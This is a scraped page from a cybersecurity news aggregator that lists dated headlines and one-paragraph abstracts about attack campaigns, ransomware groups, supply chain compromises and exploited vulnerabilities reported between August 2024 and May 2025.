Attack
May 13, 2025
DragonForce Goes Retail: Inside the Cyber Siege of M&S, Co-op, and Harrods Full Text
Abstract
DragonForce, a former hacktivist group turned Ransomware-as-a-Service (RaaS) operation, has launched a coordinated cyber offensive against major UK retailers—Marks & Spencer (M&S), Co-op, and Harrods.Irembezci
May 10, 2025
Over 40 Hacktivist Groups Target India in Coordinated Cyber Campaign: High Noise, Low Impact Full Text
Abstract
A coordinated cyber campaign dubbed #OpIndia was launched by over 40 ideologically motivated hacktivist groups following recent geopolitical tensions between India and Pakistan.The Cyber Express
May 9, 2025
Hackers Exploit Windows Remote Management to Evade Detection in AD Networks Full Text
Abstract
A new wave of cyberattacks is exploiting WinRM to conduct stealthy lateral movement within AD environments. By leveraging this legitimate administrative tool, attackers evade detection and blend into normal network activity.GBHackers
May 5, 2025
Threat Actors Target Critical National Infrastructure with New Malware and Tools Full Text
Abstract
Between April and November 2024, attackers exfiltrated targeted email data and mapped virtualization infrastructure. Following containment efforts in late 2024, they escalated operations by deploying additional web shells, SystemBC and MeshCentral.GBHackers
May 2, 2025
Harrods becomes latest retailer to announce attempted cyberattack Full Text
Abstract
Harrods, the luxury department store in London, has become the latest U.K. retailer to announce detecting an attempted cyberattack following similar announcements by Marks & Spencer and the Co-op.The Record
April 29, 2025
Spike in Git Configuration Crawling Highlights Risk of Codebase Exposure Full Text
Abstract
A major spike in cyber reconnaissance was observed between April 20–21, 2025, with over 4,800 unique IPs attempting to access Git configuration files. This marked the fourth and largest such spike since September 2024.Grey Noise
April 29, 2025
French BEC Threat Actor Targets Property Payments Full Text
Abstract
TA2900, is targeting French-speaking individuals with fraudulent rental payment schemes. The campaigns are designed to steal funds by impersonating rental agencies and redirecting rent payments to attacker-controlled bank accounts.Proof Point
April 29, 2025
Finding Minhook in a sideloading attack – and Sweden too Full Text
Abstract
A sideloading campaign active from late 2023 to early 2024 targeted organisations in East Asia and later Sweden, delivering Cobalt Strike payloads via legitimate Windows executables and malicious DLLs.Sophos
April 23, 2025
Hackers Deploy New Malware Disguised as Networking Software Updates Full Text
Abstract
A sophisticated backdoor campaign is actively targeting Russian government, financial, and industrial sectors by masquerading as legitimate ViPNet software updates. The malware leverages trusted update mechanisms to infiltrate systems.GBHackers
April 21, 2025
Zoom has a remote control feature and crypto thieves are abusing it - Risky Business Media Full Text
Abstract
A newly uncovered campaign by the threat group ELUSIVE COMET exploits Zoom’s remote control feature to hijack victims’ systems. The attackers use social engineering tactics, impersonating Bloomberg Crypto.Risky
April 21, 2025
Chinese Ghost Hackers Hit Hospitals And Factories In America And U.K. Full Text
Abstract
Ghost ransomware hackers strike in 70 countries. However, North America and the U.K. have been most attacked by the Ghost ransomware hackers. The campaigns are operated by a financially motivated group from China.Forbes
April 18, 2025
SCAMONOMICS THE DARK SIDE OF STOCK & CRYPTO INVESTMENTS IN INDIA Full Text
Abstract
A coordinated fraud campaign is targeting investors using fake investment platforms, impersonation tactics, and compromised legitimate websites. These schemes aim to steal financial data and defraud victims through social engineering.Cyfirma
April 15, 2025
Hackers Use Microsoft Teams Chats to Deliver Malware to Windows PCs Full Text
Abstract
A sophisticated cyberattack campaign has emerged, leveraging Microsoft Teams chats to infiltrate Windows PCs with malware, according to a recent report by cybersecurity firm ReliaQuest.GBHackers
April 10, 2025
GOFFEE’s recent attacks: new tools and techniques Full Text
Abstract
GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that researchers dubbed “PowerModul”.Security List
April 8, 2025
ToddyCat Group Abused Flaw in ESET Security Software to Plant Malicious DLLs Full Text
Abstract
During the campaign, the hackers exploited the ESET vulnerability (CVE-2024-11859) to load a new tool dubbed TCDSB onto victims' devices, disguising it as a legitimate DLL — a common file type in the Windows operating system.The Record
March 31, 2025
Russian Intelligence-backed Campaigns Impersonate the CIA to Target Ukraine Sympathizers, Russian Citizens, and Informants Full Text
Abstract
Silent Push Threat Analysts discovered a phishing campaign using website lures to gather information against Russian individuals sympathetic to defending Ukraine and willing to share sensitive information.Silent Push
March 27, 2025
New SparrowDoor Backdoor Variants Found in Attacks on U.S. and Mexican Organizations Full Text
Abstract
The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad.The Hacker News
March 26, 2025
Browser-in-the-Browser Attacks Target CS2 Players’ Steam Accounts Full Text
Abstract
This phishing technique creates fake browser windows within real browser windows (Browser in the Browser) to create login pages or other realistic forms to steal users' credentials or one-time MFA passcodes (OTP).Bleeping Computer
March 25, 2025
Cyberattack Hits Ukrainian State Railway, Disrupting Online Ticket Sales Full Text
Abstract
The attack disrupted online services, including the mobile app used for ticket purchases, but did not affect train schedules, Ukrzaliznytsia said. The railway operator is investigating the incident along with Ukraine’s security services.The Record
March 24, 2025
Cybercriminals Exploit Check Point Driver Flaws in Malicious Campaign Full Text
Abstract
A security researcher found that a component of Check Point’s ZoneAlarm antivirus software is being exploited by threat actors in malicious campaigns to bypass Windows security measures.Infosecurity Magazine
March 20, 2025
Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners Full Text
Abstract
Bitdefender reported that hackers are exploiting a severe PHP flaw, CVE-2024-4577, on Windows CGI systems, deploying Quasar RAT and XMRig miners, with significant attacks in Taiwan, Hong Kong, and Brazil since late 2024.The Hacker News
March 19, 2025
Update: GitHub Action Hack Likely Led to Another in Cascading Supply Chain Attack Full Text
Abstract
A cascading supply chain attack that began with the compromise of the "reviewdog/action-setup@v1" GitHub Action is believed to have led to the recent breach of "tj-actions/changed-files" that leaked CI/CD secrets.Bleeping Computer
March 18, 2025
Attackers Exploit OpenAI ChatGPT Vulnerability in the Wild Full Text
Abstract
A server-side request forgery (SSRF) vulnerability in ChatGPT, tracked as CVE-2024-27564, has become a significant target for cybercriminals, with over 10,479 attack attempts recorded from a single malicious IP, according to Veriti’s latest research.Security Online
March 12, 2025
Update: Critical PHP RCE vulnerability Mass Exploited in New Attacks Full Text
Abstract
GreyNoise detected 1,089 unique IPs exploiting CVE-2024-4577 in January 2025, with attacks spreading beyond Japan to Singapore, Indonesia, the UK, Spain, and India. Over 43% of attacks originate from Germany and China.Bleeping Computer
March 11, 2025
Blind Eagle: …And Justice for All - Check Point Research Full Text
Abstract
Check Point Research discovered a series of ongoing campaigns targeting Colombian institutions and government entities since November 2024. The campaigns are linked to Blind Eagle and deliver malicious .url files.CheckPoint
March 10, 2025
Majority of Orgs Hit by AI Cyber-Attacks as Detection Lags Full Text
Abstract
Most (87%) security professionals have reported that their organization has encountered an AI-driven cyber-attack in the last year, with the technology increasingly takes hold, according to a new report by SoSafe.Infosecurity Magazine
March 8, 2025
Akira Ransomware Gang Encrypted Network From a Webcam to Bypass EDR Full Text
Abstract
The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.Bleeping Computer
March 8, 2025
Russia Claims Ukraine Hacked State Youth Organizations to Recruit Minors Full Text
Abstract
A Russian security agency has accused Ukraine of hacking two Kremlin-backed youth military-patriotic organizations to gather student data for potential recruitment in espionage or terrorist activities.The Record
March 7, 2025
New ‘Desert Dexter’ Campaign Hits Over 900 Victims in Middle East, North Africa, and Other Regions Full Text
Abstract
The threat actors behind Desert Dexter employ a multi-stage attack chain that leverages social media platforms, legitimate file-sharing services, and geopolitical lures to distribute a modified version of the AsyncRAT malware.GBHackers
March 6, 2025
China-Linked Silk Typhoon Expands Cyberattacks to IT Supply Chains for Initial Access Full Text
Abstract
The China-linked threat actor behind the zero-day exploitation of security flaws in Microsoft Exchange servers in January 2021 has shifted its tactics to target the IT supply chain as a means to obtain initial access to corporate networks.The Hacker News
March 6, 2025
Sophisticated Business Email Compromise Attack Targets B2B Transactions Full Text
Abstract
The attack involved three business partners (Partner A, Partner B, and Partner C) exchanging invoices via email. The threat actor gained access to a third-party email server, giving them complete visibility into ongoing transactions.Trend Micro
March 5, 2025
New Cyber-Espionage Campaign Targets UAE Aviation Sector and Transport Infrastructure Full Text
Abstract
The attack campaign, attributed by Proofpoint to a cluster known as UNK_CraftyCamel, employed a sophisticated infection chain to deploy a newly discovered backdoor named Sosano.Infosecurity Magazine
February 22, 2025
REF7707 Espionage Campaign Targets South America and Southeast Asia Full Text
Abstract
The attackers behind REF7707 deployed novel malware families—FINALDRAFT, GUIDLOADER, and PATHLOADER—to gain persistence and execute highly sophisticated network intrusions.Security Online
February 15, 2025
China’s Salt Typhoon Hackers Targeting Cisco Devices Used by Telcos, Universities Full Text
Abstract
Recorded Future researchers said the Chinese nation-state threat group intruded five additional telecom networks between December and January, including two unnamed providers in the U.S..CyberScoop
February 12, 2025
Attackers Exploit a New Zero-Day to Hijack Fortinet Firewalls Full Text
Abstract
Fortinet warned that threat actors are exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in FortiOS and FortiProxy to hijack Fortinet firewalls.Security Affairs
February 12, 2025
Triplestrength Hits Victims With Ransomware, Cloud Hijacks, Cryptomining Full Text
Abstract
A previously unknown gang dubbed Triplestrength poses a triple threat to organizations: It infects victims' computers with ransomware, then hijacks their cloud accounts to illegally mine for cryptocurrency.The Register
February 11, 2025
DragonRank Exploits IIS Servers with BadIIS Malware for SEO Fraud and Gambling Redirects Full Text
Abstract
Targets of the campaign include IIS servers located in India, Thailand, Vietnam, Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil. These servers are associated with government, universities, tech companies, and telecommunications firms.The Hacker News
February 10, 2025
Microsoft Says Attackers Use Exposed ASP.NET Keys to Deploy Malware Full Text
Abstract
Threat actors also use machine keys from publicly available sources in code injection attacks to create malicious ViewStates (used by ASP.NET Web Forms to control state and preserve pages) by attaching crafted message authentication code (MAC).Bleeping Computer
February 10, 2025
Massive Brute Force Attack Uses 2.8 Million IPs to Target VPN Devices Full Text
Abstract
A large-scale brute force password attack using almost 2.8 million IP addresses is underway, attempting to guess the credentials for a wide range of networking devices, including those from Palo Alto Networks, Ivanti, and SonicWall.Bleeping Computer
February 7, 2025
Attackers Use NOVA Stealer to Target Russian Organizations Full Text
Abstract
The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial variant of the SnakeLogger malware. This campaign is primarily targeting Russian organizations across various sectors.BI.Zone
February 5, 2025
Ukrainian Organizations Targeted in Zero-Day Campaign and Homoglyph Attacks Full Text
Abstract
The vulnerability was actively exploited by Russian cybercrime groups through spear-phishing campaigns, using homoglyph attacks to spoof document extensions and trick users and the Windows Operating System into executing malicious files.Trend Micro
February 4, 2025
Kazakhstan to Audit Foreign Ministry After Suspected Russia-Linked Cyberattack Full Text
Abstract
The hacker group behind this operation — tracked as UAC-0063 — is potentially linked to the Russian state-sponsored threat actor APT28, also known as Fancy Bear or BlueDelta.The Record
February 3, 2025
Meta Confirms Zero-Click WhatsApp Spyware Attack Targeting 90 Journalists, Activists Full Text
Abstract
The campaign, which targeted around 90 members, involved the use of spyware from an Israeli company known as Paragon Solutions. The attackers were neutralized in December 2024.The Hacker News
February 1, 2025
Syncjacking Attack Enables Full Browser and Device Takeover Full Text
Abstract
The new attack method, discovered by security researchers at SquareX, involves several steps, including Google profile hijacking, browser hijacking, and, eventually, device takeover.Infosecurity Magazine
February 1, 2025
HTTP Client Tools Exploitation for Account Takeover Attacks Full Text
Abstract
Most HTTP-based cloud attacks utilize brute force methods, resulting in low success rates. Proofpoint found that a recent campaign using the unique HTTP client Axios had an especially high success rate, compromising 43% of targeted user accounts.Proofpoint
January 31, 2025
Stealthy Attack Deploys Coyote Banking Trojan via LNK Files Full Text
Abstract
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.Fortinet
January 22, 2025
Russian Telecom Giant Rostelecom Investigates Suspected Cyberattack on Contractor Full Text
Abstract
The company stated that the contractor is responsible for maintaining Rostelecom’s corporate website and procurement portal, both of which were reportedly targeted by hackers.The Record
January 17, 2025
Hackers Use Google Search Ads to Steal Google Ads Accounts Full Text
Abstract
The attackers are running ads on Google Search impersonating Google Ads, showing as sponsored results that redirect potential victims to fake login pages hosted on Google Sites but looking like the official Google Ads homepage.Bleeping Computer
January 14, 2025
Snoops exploited Fortinet firewalls with ‘probable’ 0-day Full Text
Abstract
Miscreants running a "mass exploitation campaign" against Fortinet firewalls, which peaked in December, may be using an unpatched zero-day vulnerability to compromise the equipment.The Register
January 13, 2025
High-Traffic Sites Attacked in “zqxq” Campaign Through Obfuscated Javascript Injection Full Text
Abstract
The malware used in the campaign hides in legitimate files using scrambled variables and custom functions like HttpClient, rand, and token. These methods evade detection and hinder analysis by researchers.Maleware Bytes
January 13, 2025
RedDelta Deploys PlugX Malware to Target Mongolia and Taiwan in Espionage Campaigns Full Text
Abstract
Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by the China-nexus RedDelta threat actor to deliver a customized version of the PlugX backdoor between July 2023 and December 2024.Cyware
January 10, 2025
MirrorFace Leverages ANEL and NOOPDOOR in Multi-Year Cyberattacks on Japan Full Text
Abstract
Japanese authorities have accused a China-linked hacking group, known as MirrorFace, of carrying out a long-running cyberattack campaign against organizations and individuals in Japan since 2019.The Hacker News
January 7, 2025
Supply Chain Attack Targets Key Ethereum Development Tools Full Text
Abstract
This attack, discovered by Socket, involves the distribution of 20 malicious npm packages created by three primary authors. One package, @nomicsfoundation/sdk-test, was downloaded 1092 times.Infosecurity Magazine
December 30, 2024
North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign Full Text
Abstract
North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie. The development is a sign that the threat actors are actively updating their tools.Cyware
December 21, 2024
Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware Full Text
Abstract
The Lazarus Group, an infamous North Korea threat actor, has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024.The Hackers
December 17, 2024
Novel ‘TPUXtract’ Attack can Infer the Internal Structure of AI Models Full Text
Abstract
Researchers at North Carolina State University demonstrated how to recreate a neural network using the electromagnetic (EM) signals emanating from the chip it runs on using a new method called "TPUXtract."Dark Reading
December 7, 2024
Romania’s Election Systems Targeted in Over 85,000 Cyberattacks Full Text
Abstract
Threat actors obtained access credentials for election-related websites and leaked them on a Russian hacker forum less than a week before the first presidential election round.Bleeping Computer
December 7, 2024
Threat Actor Targets Manufacturing Industry With Lumma Stealer and Amadey Bot Full Text
Abstract
This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload.Cyble
December 5, 2024
Cloudflare’s Developer Domains Increasingly Abused by Threat Actors Full Text
Abstract
Cloudflare's 'pages.dev' and 'workers.dev' domains, used for deploying web pages and facilitating serverless computing, are being increasingly abused by cybercriminals for phishing and other malicious activities.Bleeping Computer
December 2, 2024
SmokeLoader Malware Campaign Targets Companies in Taiwan Full Text
Abstract
SmokeLoader is a modular malware known for its adaptability and evasion techniques. It is being used in this attack to directly execute its payloads rather than serving as a downloader for other malicious software.Infosecurity Magazine
November 29, 2024
MUT-8694 Supply Chain Attack Targets npm and PyPI Ecosystems Full Text
Abstract
Datadog’s analysis revealed 42 malicious PyPI packages and 18 npm packages linked to the campaign, each mimicking legitimate libraries. The PyPI packages falsely claimed to resolve DLL and API issues, while many npm packages referenced Roblox.Security Online
November 26, 2024
Zyxel Firewalls Targeted in Recent Ransomware Attacks Full Text
Abstract
Zyxel warns that a ransomware gang has been exploiting a recently patched command injection vulnerability, CVE-2024-42057, in its firewalls for initial compromise. Remote, unauthenticated attackers could exploit the flaw to execute OS commands.Security Affairs
November 23, 2024
China-Linked TAG-112 Targets Tibetan Media with Cobalt Strike Espionage Campaign Full Text
Abstract
A China-linked nation-state group called TAG-112 compromised Tibetan media and university websites in a new cyber espionage campaign designed to facilitate the delivery of the Cobalt Strike post-exploitation toolkit.The Hacker News
November 23, 2024
China-linked hackers target Linux systems with new spying malware Full Text
Abstract
According to the researchers, a China-linked state-sponsored threat actor has been targeting Linux systems with previously unknown malware strains in a new espionage campaign.The Record
November 21, 2024
Dozens of Central Asian targets hit in recent Russia-linked cyber-espionage campaign Full Text
Abstract
Researchers have identified an ongoing Russia-linked cyber-espionage campaign targeting human rights groups, private security companies, and state and educational institutions in Central Asia, East Asia, and Europe using custom malware.The Record
November 20, 2024
Ghost Tap: Hackers Exploiting NFCGate to Steal Funds via Mobile Payments Full Text
Abstract
The technique, codenamed Ghost Tap by ThreatFabric, enables cybercriminals to cash-out money from stolen credit cards linked to mobile payment services such as Google Pay or Apple Pay and relaying NFC traffic.The Hacker News
November 19, 2024
Hackers Hijack Unsecured Jupyter Notebooks to Stream Illegal Sports Broadcasts Full Text
Abstract
The attacks involve the hijack of unauthenticated Jupyter Notebooks to establish initial access, and perform a series of actions designed to facilitate illegal live streaming of sports events.The Hacker News
November 16, 2024
New LodaRAT Campaign Targets Global Victims with Updated Capabilities Full Text
Abstract
Researchers at Rapid7 have uncovered a new campaign using LodaRAT, a well-known remote access tool active since 2016. The latest variant expands by targeting cookies and credentials from Microsoft Edge and Brave browsers.Security Online
November 16, 2024
Sliver and Ligolo-ng Attack Leverages Y Combinator Brand Full Text
Abstract
Security researchers at Hunt.io have found a recent cyber operation using the Sliver command-and-control (C2) framework and Ligolo-ng tunneling tool. The operation targeted victims using the trusted name of Y Combinator.Security Online
November 16, 2024
Sitting Ducks DNS Attacks Put Global Domains at Risk Full Text
Abstract
Using the Sitting Ducks attack, cybercriminals have taken control of many domain names since 2018, impacting numerous well-known companies, non-profits, and government entities.Infosecurity Magazine
November 13, 2024
Hamas Tied to October Wiper Attacks Using Eset Email Full Text
Abstract
Check Point Research indicated that WIRTE has expanded from espionage to include disruptive attacks. Evidence shows that the malware employed by this group is connected to SameCoin, a wiper malware that has previously affected Israeli entities.Healthcare Infosecurity
November 9, 2024
China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait Full Text
Abstract
MirrorFace, a Chinese state-linked threat actor, targeted a diplomatic organization in the European Union for the first time. The attack used the World Expo 2025 in Osaka, Japan, as a lure.The Hacker News
November 9, 2024
Silent Skimmer Gets Loud Again Full Text
Abstract
During a Silent Skimmer campaign in May 2024, attackers gained access to servers by exploiting outdated Telerik UI vulnerabilities, deploying reverse shells, and using tools like GodPotato for privilege escalation.Palo Alto Networks
November 8, 2024
Threat Actors Behind VEILDrive Campaign Exploit Microsoft Services for C2 Full Text
Abstract
The ongoing threat campaign known as VEILDrive is utilizing Microsoft services such as Teams, SharePoint, Quick Assist, and OneDrive in its operations to distribute spear-phishing attacks and store malware.Hunters
November 4, 2024
Supply Chain Attack on Popular Animation Library Lottie-Player Targets Web3 Users Full Text
Abstract
Malicious actors executed a sophisticated supply chain attack on the widely-utilized JavaScript library lottie-player, infecting versions 2.0.5, 2.0.6, and 2.0.7 with malicious code that prompts a fake Web3 wallet connection.Cyware
November 4, 2024
Sophos Mounted Counter-Offensive Operation to Foil Chinese Attackers Full Text
Abstract
Sophos research uncovered adversarial tactics including the Cloud Snooper backdoor, Asnarök botnet campaign, UEFI bootkit exploits, and the CVE-2022-1040 zero-day vulnerability, all intercepted before harming targeted organizations.Cyware
October 31, 2024
Massive PSAUX Ransomware Attack Targets 22,000 CyberPanel Instances Full Text
Abstract
LeakIX reported over 21,000 vulnerable CyberPanel instances exposed online, mainly in the U.S. Overnight, cybercriminals likely exploited these servers, installing the PSAUX ransomware to drastically reduce the number of exposed instances.Bleeping Computer
October 29, 2024
Russia Targets Ukrainian Military via Spoofed Recruitment App Full Text
Abstract
Researchers from Google's Threat Intelligence Group (TAG) and Mandiant have identified a campaign named UNC5812 that uses a fake version of the "Civil Defense" tool to drop malware and spread misinformation.Dark Reading
October 28, 2024
HeptaX Cyberespionage Campaign Snoops Through Unauthorized RDP Connections Full Text
Abstract
The attackers heavily rely on PowerShell and BAT scripts to download additional payloads and create an administrative user account on compromised systems, lowering authentication barriers for unauthorized remote access.Cyware
October 23, 2024
Attackers Target Exposed Docker Remote API Servers With perfctl Malware Full Text
Abstract
The attack sequence starts with probing the Docker Remote API server by pinging it, creating a container with specific settings, and executing payloads using the Docker Exec API.Trend Micro
October 22, 2024
Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain Full Text
Abstract
APT41, a Chinese nation-state actor, conducted a cyberattack targeting the gambling and gaming industry. Over six months, they gathered valuable information from a company including network configurations and user passwords.Cyware
October 17, 2024
Hackers Target Ukraine’s Potential Conscripts With MeduzaStealer Malware Full Text
Abstract
Hackers are targeting potential conscripts in Ukraine with the MeduzaStealer malware, distributed through a Telegram account disguised as a technical support bot for the Reserve+ government app.The Record
October 15, 2024
Earth Simnavaz Levies Advanced Cyberattacks Against UAE and Gulf Regions Full Text
Abstract
The group uses sophisticated tactics like leveraging Microsoft Exchange servers for credentials theft and exploiting vulnerabilities for privilege escalation. They blend malicious activity with normal network traffic to evade detection.Trend Micro
October 10, 2024
Progress Telerik UI, Cisco ASA WebVPN, QNAP QTS, and Linux Systems Under Attack Full Text
Abstract
Vulnerabilities in Progress Telerik UI for WPF and D-Link routers have been exploited, along with the targeting of QNAP QTS firmware and Cisco ASA WebVPN. Additionally, critical flaws in PHP, GeoServer, and AVTECH IP cameras are under attack.The Cyber Express
October 7, 2024
China-linked CeranaKeeper Group Targets Southeast Asia with Data Exfiltration Attacks Full Text
Abstract
The custom toolset used by the Thailand-based CeranaKeeper group includes WavyExfiller, DropboxFlop, OneDoor, and BingoShell for various data exfiltration and remote control purposes.The Hacker News
October 7, 2024
Royal Mail-Themed Lures Deliver Open Source Prince Ransomware Full Text
Abstract
Hackers posed as the UK's Royal Mail to spread Prince ransomware in a destructive campaign that targeted organizations in the US and UK in mid-September. Unlike typical ransomware attacks, this campaign had no decryption methods.Proof Point
September 28, 2024
BBTok Targeting Brazil Using the AppDomain Manager Injection Technique Full Text
Abstract
The Brazilian-targeted threat BBTok has a complex infection chain that starts with an email containing an ISO image. The malware compiles C# code directly on the infected machine and uses the AppDomain Manager Injection technique.GData Software
September 28, 2024
Hackers Deploy AI-Written Malware in Targeted Attacks Full Text
Abstract
Hackers are now using AI-generated malware in targeted attacks. In a recent email campaign in France, researchers found malicious code crafted with the help of generative AI to distribute the AsyncRAT malware.Bleeping Computer
September 21, 2024
Clever ‘GitHub Scanner’ Campaign Abusing Repositories to Push Malware Full Text
Abstract
A sophisticated campaign is using GitHub repositories to spread the Lumma Stealer malware, targeting users interested in open-source projects or receiving email notifications from them.Bleeping Computer
September 19, 2024
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC Region Full Text
Abstract
In this campaign aimed at the APAC region, Earth Baxia used a new backdoor named EAGLEDOOR, which supports multiple communication protocols for information gathering and payload delivery.TrendMicro
September 14, 2024
Fileless Remcos RAT Campaign Leverages CVE-2017-0199 Flaw Full Text
Abstract
In a newly uncovered advanced malware campaign, threat actors are using a complex, fileless approach to deliver the Remcos Remote Access Trojan (RAT), leveraging a benign-looking Excel document as the attack vector.Security Online
September 14, 2024
Targeted Campaigns in Retail Sector Involve Domain Fraud, Brand Impersonation, and Ponzi Schemes Full Text
Abstract
Threat actors are actively engaging in domain fraud, brand impersonation, and Ponzi schemes targeting the retail sector, which plays a significant role in the global economy.Domain Tools
September 14, 2024
Update: Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities Full Text
Abstract
Trend Micro researchers uncovered remote code execution attacks targeting Progress Software's WhatsUp Gold using the vulnerabilities tracked as CVE-2024-6670 and CVE-2024-6671.Trend Micro
September 11, 2024
Chinese ‘Crimson Palace’ Espionage Campaign Keeps Hacking Southeast Asian Governments Full Text
Abstract
A sophisticated trio of Chinese cyberespionage groups known as Cluster Alpha, Cluster Bravo, and Cluster Charlie are behind the Crimson Palace espionage campaign targeting government organizations in Southeast Asia.The Record
September 10, 2024
Kimsuky-linked Hackers Use Similar Tactics to Attack Russia and South Korea Full Text
Abstract
Known as Konni, the threat actor uses similar tactics in both countries since at least 2021, targeting entities like the Russian Ministry of Foreign Affairs, the Russian Embassy in Indonesia, and South Korean businesses, including a tax law firm.The Record
September 10, 2024
‘TIDrone’ Cyberattackers Target Taiwan’s Drone Manufacturers Full Text
Abstract
TIDrone, linked to Chinese-speaking groups, deploys advanced malware through ERP software or remote desktop tools. Trend Micro identified the threat actor as actively pursuing military and satellite industrial supply chains in Taiwan.Dark Reading
September 10, 2024
Cybercriminals Target Latin American Banks with Mekotio, BBTok, and Grandoreiro Trojans Full Text
Abstract
These campaigns aim to steal sensitive banking credentials using innovative tactics, expanding beyond traditional regions like Brazil and Argentina to industries such as manufacturing, retail, and financial services.Security Online
September 7, 2024
BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar Full Text
Abstract
The BlindEagle APT group has recently targeted the Colombian insurance sector. The attack chain starts with a phishing email impersonating DIAN, the Colombian tax authority.ZScalar
September 5, 2024
Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government Full Text
Abstract
This campaign, active since July, utilizes at least three malicious ISO files to compromise Malaysian entities, containing components like a malicious executable and a decoy PDF file, ultimately delivering the Babylon RAT as a final payload.Cyble
September 5, 2024
Revival Hijack Attack Puts 22,000 PyPI Packages at Risk of Hijack Full Text
Abstract
This method could potentially lead to numerous malicious package downloads. The attack involves hijacking popular projects by registering new projects under the names of removed packages on PyPI.JFrog
September 3, 2024
Roblox Developers Under Attack by New Malicious NPM Campaign Full Text
Abstract
Roblox developers are being targeted by a new malicious npm campaign. Cybercriminals have created fake Roblox npm packages with the aim of deploying a remote access trojan called Quasar.Tech Radar
September 2, 2024
GreenCharlie Infrastructure Targeting US Political Entities with Advanced Phishing and Malware Full Text
Abstract
GreenCharlie attackers use dynamic DNS providers to register domains for phishing attacks, with deceptive themes like cloud services and document visualization to trick victims into revealing sensitive information or downloading malware payloads.Recorded Future
September 2, 2024
North Korean Cyberattacks Persist: Developers Targeted via npm Packages Full Text
Abstract
The campaign, known as "Contagious Interview," tricks developers into downloading fake npm packages or installers. The attackers deploy a Python payload named InvisibleFerret to steal data from cryptocurrency wallets.Security Online
August 31, 2024
New Snake Keylogger Variant Slithers Into Phishing Campaigns Full Text
Abstract
The attack starts with a phishing email disguised as a fund transfer notification, with an attached Excel file named “swift copy.xls” that triggers the deployment of Snake Keylogger on the victim's computer upon opening.Security Online
August 31, 2024
Suspected Espionage Campaign Delivers New Voldemort Malware Full Text
Abstract
The campaign, which targeted organizations worldwide, involved impersonating tax authorities from various countries and utilizing Google Sheets for command and control (C2).Proof Point
August 27, 2024
New Cheana Stealer Threat Targets VPN Users Across Multiple Operating Systems Full Text
Abstract
This campaign is notable for its malicious apps for Windows, Linux, and macOS users. The attackers have created different versions of Cheana Stealer for each OS to widen their attack surface.The Cyber Express
August 27, 2024
India’s Critical Infrastructure Suffers Spike in Cyberattacks Full Text
Abstract
India is experiencing a rise in cyberattacks on its critical infrastructure, particularly in the financial and government sectors, prompting the Reserve Bank of India to issue warnings about the need for enhanced cybersecurity measures.Dark Reading
August 24, 2024
Hackers Now Use AppDomain Injection to Drop Cobalt Strike Beacons Full Text
Abstract
Hackers are now using AppDomain Injection to drop Cobalt Strike beacons in a series of attacks that began in July 2024. This technique, known as AppDomain Manager Injection, can weaponize any Microsoft .NET application on Windows.Bleeping Computer
August 21, 2024
TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset Full Text
Abstract
Iran-linked TA453 targeted a religious figure with a fake podcast interview invitation, attempting to deliver the BlackSmith malware toolkit. The initial lure involved an email leading to a malicious link containing the AnvilEcho PowerShell trojan.Proof Point
August 21, 2024
New Msupedge Backdoor Targeting Taiwan Employs Stealthy Communications Full Text
Abstract
Hackers have been using a PHP vulnerability to deploy a stealthy backdoor called Msupedge. This backdoor was recently used in a cyberattack against an unnamed university in Taiwan.Symantech
August 19, 2024
Update: Windows Zero-Day Flaw was Exploited by North Korea-linked Lazarus APT Full Text
Abstract
Microsoft has patched a zero-day vulnerability, known as CVE-2024-38193, that was being exploited by the North Korea-linked Lazarus APT group. This vulnerability is a privilege escalation issue in the Windows Ancillary Function Driver for WinSock.Security Affairs
August 17, 2024
Dozens of Google Products Targeted by Scammers via Malicious Search Ads Full Text
Abstract
Scammers have been targeting dozens of Google products through malicious search ads. They impersonated Google's product line and used Looker Studio to lock up Windows and Mac users' browsers.Malware Bytes
August 17, 2024
A Deep Dive Into a New ValleyRAT Campaign Targeting Chinese Speakers Full Text
Abstract
The malware masquerades as legitimate applications like Microsoft Office and creates an empty file to lure users. It also checks for virtual machines and uses sleep obfuscation to evade memory scanners.Fortinet
August 15, 2024
Ongoing Social Engineering Campaign Refreshes Payloads Full Text
Abstract
Rapid7 identified multiple intrusion attempts by threat actors utilizing social engineering tactics on June 20, 2024. The threat actors use email bombs followed by calls to offer fake solutions, with recent incidents involving Microsoft Teams calls.Rapid7
August 13, 2024
New Dark Skippy Attack Let Hackers Steal Secret Keys From Signing Devices Full Text
Abstract
The "Dark Skippy" method allows hackers to steal Bitcoin hardware wallet keys by embedding secret data into public Bitcoin transactions, which can then be used to extract a person's seed words.Cybersecurity News
August 10, 2024
North Korea Kimsuky Launch Phishing Attacks on Universities Full Text
Abstract
Cybersecurity analysts have uncovered critical details about the North Korean advanced persistent threat (APT) group Kimsuky, which has been targeting universities as part of its global espionage operations.Infosecurity Magazine
August 6, 2024
Bloody Wolf Strikes Organizations in Kazakhstan with STRRAT Commercial Malware Full Text
Abstract
